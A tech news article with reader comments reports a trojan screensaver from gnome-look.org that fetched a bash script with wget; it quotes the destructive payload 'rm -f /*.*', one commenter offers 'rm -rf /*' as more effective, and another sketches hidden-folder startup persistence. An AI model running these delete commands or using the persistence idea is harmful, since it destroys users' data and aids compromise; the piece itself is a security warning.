Carelessness busts Linux security

Carelessness busts Linux security

Summary: No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.

SHARE:
19

No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.

The latest reminder to be vigilant comes via the users unfortunate enough to download and install a malicious screensaver from gnome-look.org.

Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been.

The program inserted a bash script into /usr/bin/ by using wget and then executing the script. Originally the script's contents were a ping command but this was later changed to:

rm -f /*.*
echo "You see this? It's changed, before it was set to ping?"

Thankfully, the delete command above will be mostly ineffectual in Linux systems. But just as Windows users need to be wary of downloads from third-party sites, so too should Linux users not trust non-repository content.

The fix for this "infection" is rather simple, but despite the simplicity and ineffectiveness of this trojan, it should still serve as a Linux security wake-up call. Not for the operating system itself, but for the people using it.

If users continue to trust arbitrary code, then security risks will occur.

Topics: Security, Linux, Open Source

About

Chris started his journalistic adventure in 2006 as the Editor of Builder AU after originally joining CBS as a programmer. After a Canadian sojourn, he returned in 2011 as the Editor of TechRepublic Australia, and is now the Australian Editor of ZDNet.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

19 comments
Log in or register to join the discussion
  • heh - that would suck

    gotta stay vigilant - don't get lazy
    anonymous
  • and DON'T RUN AS ROOT

    nt
    anonymous
  • duh

    If the programming is as good as his use of punctuation, he'd better go back to Windows viruses.
    anonymous
  • Linux Virus Definition

    So what is the definition of a Linux Virus ?

    It's a script that could have done a lot of damage if you were a total idiot , didn't bother to read the "how to use linux" manual , somehow had someone else set the system up for you , since no one who can accomplish that task is capable of falling for this stunt, and then had the system handed over to you.

    I still don't believe it though since downloading from outside the repository is a technical exercise in itself and you'd have to be drunk and looking for trouble to do it.

    And thats what defines a Linux Virus.

    Hey , if you have to get drunk and turn off most of your security for it to hurt you , I'm not going to panic.
    anonymous
  • wow

    Actually, I'm pretty sure that would do almost nothing since it's not going to be running as root. Unless the user is THAT dumb ...

    In addition, rm -f /*.* would be less effective than rm -rf /*
    anonymous
  • linux ....

    Strictly speaking, a linux virus is the same as a windows virus .... but for linux. Meaning it replicates itself and infects other machines, or however they define viruses in general.

    And installing things from outside the repository isn't always a bad thing. Until just recently, Ubuntu had old versions of netbeans and eclipse in the repos. And even more recently, there is no version of the google chrome beta for linux in the Ubuntu Repos. So I downloaded a .deb file. Not a "technical exercise". Any windows user knows how to install an .exe. .deb is almost the same.

    Theming and the like is difficult to customize if you stick to repos as well.

    My point is, there are lots of good reasons to download software from outside the repos.

    However, it's also important to note that you should only do so from trusted sources. gnome-look.org just lost a little trustworthiness, though I do believe this has been the only time something like this has happened.

    Don't be so harsh on non-linux users. It's that kind of attitude that will prevent mainstream adoption. Maybe you don't care, but in any case, it makes linux look like a toy reserved for super-nerds.

    Also, I've never read this "how to use linux" manual, where can I get it?
    anonymous
  • will the uploader be prosecuted?

    Someone uploaded code deliberately designed to damage systems' integrity. At the very least, this needs to be investigated.
    anonymous
  • on most systems it would do nothing

    On my system and most others, that rm command would do nothing at all, since all that should be in your / directory are directories and none of them are empty (meaning that rm would not remove them) and none of them have a dot (.) in their name. So unless the person is really stupid, meaning they are running the script as root, AND have been putting files in the /, then nothing would happen.
    anonymous
  • Linux zealot?

    No, this script could have done damage to even experienced users.

    The script was executed as part of installing a deb file. Since you need root access to install a deb file, the script was also executed with root access.

    Are you saying that experienced users never install deb files from 3rd-party sources? You're misinformed if you really think so.
    anonymous
  • Carelessness busts Linux security????

    This is no different from a 3 year-old armed with a paper sword and a cardboard shield ambushing the queen and reporting it as a failed terrorist attack !!!!
    #
    I am not a virus writer and I am not giving anyone ideas here, but I am just stating the obvious - why didn't this piece of malicious code just install itself in the users home directory, create a hidden folder and add a few entries to the user's startup scripts ? From there he could mine data or delete the users data as he wishes or search all directories in the users PATH and find what folder he has write permissions to and take it from there....

    peeved! :-)

    i thought this was a serious threat!
    anonymous
  • In addition

    Just an observation but in addition to the command being improperly written to do much of anything but get a denied error, not all distribution's of GNU/Linux have WGET by default (my fedora 11 does not), granted if it were properly written and was downloaded to the home directory (I'm not sure were WGET put's it's downloaded files) thenthe users files might go missing but nothing else. Yet another attempt at FUD regarding the Linux security model (kinda like all those null pointers errors that require local access to the system the media loves).
    anonymous
  • SELinux!

    Once again - proof that "discretionary access control (DAC)" is obsolete in the global Internet age. Remember MULTICS / Trusted XENIX (Based on Microsoft's XENIX) and others that made "profiling" a base - no such thing as "root". A system "trojan" is simply a violation of policy and any modern OS should have been over that by now - but, of course we aren't. Re the statement:
    "No operating system can ever properly protect a computer from trojans as long as users continue to do silly things."
    WRONG! Yes it can - and it DID in the past as I mention above. Have a look at GEMSOS, for example! remember LINUX and Windows are NOT mandatory access control type OSes - and they should have been years ago (except for SELinux - of course - but who activates that?)
    anonymous
  • Incorrect

    Right. Tell that to the Netbook crowd.....Linux has over 40-50% market share there.

    And no, a linux virus isn't the same as a windows virus. For instance, there are 100's of thousands of Windows viruses and NO..none..nada..zip..ziltch "in the wild" Linux viruses. Not even one.........

    That alone has to tell you something.
    anonymous
  • OSX?

    Am I mistaken, or would this run in Mac OSX as well? I know they have wget installed by default.

    Not that it'd be any more effective, the writer of that is completely stupid, but still, why is this being touted as a linux problem when in fact the same "vulnerability" exists in OSX?
    anonymous
  • Also incorrect

    It doesn't tell us anything because it is not the correct information, misleading at best.

    The statistic you mention first will change the statistic you mention second. As operating systems become more mainstream they will attract the attention of those who want to cause trouble. This has been proven time and time again.

    For a brief history on virii read: http://www.pcworld.idg.com.au/article/148676/first_computer_virus_turns_20

    In recent years we've seen malicious software written for Unix/Linux-based applications if not the Unix/Linux-based operating systems. Sendmail is probably the most vulnerable programme ever rolled out. It has more holes than a sieve. Then there's Firefox, ported to both Windows and Linux but just as vulnerable on both.

    Moving to operating systems, Windows has it's problems but we are seeing an increase in security problems for OS X and mobile phone operating systems. The iPhone recently showed how vulnerable it can be.

    Yes, user settings are important. If you run a machine with full administrator privileges then there is a chance that there is a virus that can probe and exploit the weaknesses that this level of access provides. After all, administrator access is supposed to allow a legitimate user the access to perform unrestricted changes to their machines.
    anonymous
  • I wish people wouldn't use the F-word so much

    There's no criticism of the Linux security model here. Someone used a common linux distro, and downloaded a screensaver which contained a trojan. Originally it was a DDOS attack against some website.

    If the author of the trojan really wanted, he could have uploaded the users home directory to some remote location.

    That it was such a simple trojan (that worked in its original form, I might add) is just proof that using a linux distro does not equal immunity from malicious script-kiddies. It could be argued that gnome-look should have detected it before allowing it to be available from their site.
    anonymous
  • Unless the user is that dumb?

    How do you install deb files on your computer?

    I've got to admit I don't always inspect the contents of deb files, or verify the hashes of downloads.
    anonymous
  • Mitigation via Architecture

    The average person is always going to download "cool themes". There isn't much that can be done to change that.

    Screensavers will always be tricky since, by definition, they're programs. (though I'm sure bundling dozens with kscreensaver, xscreensaver, and the RSS-GLX pack, all in the distro repositories, really helps and, if someone really wanted, they could design something like Google's Native Client to sandbox screensavers)

    For other stuff, I suspect the solution will be a new, desktop-level repository system along the lines of KDE's GetHotNewStuff. That way, users don't have to choose between distro-specific (eg. deb) and potentially confusing (eg. zip/rar) and DE developers can make sure that the resource downloads (archives with metadata, bare wallpapers, or what have you) contain only what they should. (Which, for non-screensaver, non-widget resources, means sanitized metadata and no executable code) The only really tricky part I see is getting the various DE teams together on freedesktop.org to repeat the XDG .desktop file success.
    anonymous
  • NAG

    The "how to use linux" manual would probably be known as the NAG, or Network Administrator's Guide, maintained on tldp.org.
    anonymous